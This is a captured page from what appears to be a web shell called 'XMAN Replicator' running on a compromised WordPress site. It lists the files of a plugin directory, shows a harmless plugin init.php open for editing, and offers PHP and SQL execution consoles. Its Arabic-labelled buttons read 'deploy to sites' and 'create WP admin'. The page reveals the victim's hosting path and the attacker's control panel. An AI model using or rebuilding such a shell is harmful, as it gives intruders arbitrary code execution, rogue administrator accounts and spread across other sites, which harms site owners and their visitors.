🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
rlinfolily
/
www
/
wp-content
/
plugins
/
upme
/
init
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwx---r-x
2015-02-16 10:03
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwx---r-x
2015-02-16 10:04
🔄
🗑️
🗑️📁
⬇️
🔒
init.php
361 B
-rw----r--
2015-02-16 10:03
✏️
🔄
🗑️
⬇️
🔒
Edit: init.php
<?php /* Load plugin text domain (localization) */ add_action('init', 'upme_load_textdomain'); function upme_load_textdomain() { load_plugin_textdomain( 'upme', false,'/upme/l10n'); } //allow redirection, even if my theme starts to send output to the browser add_action('init', 'upme_output_buffer'); function upme_output_buffer() { ob_start(); }
Save
PHP Console
Execute
SQL Console
Execute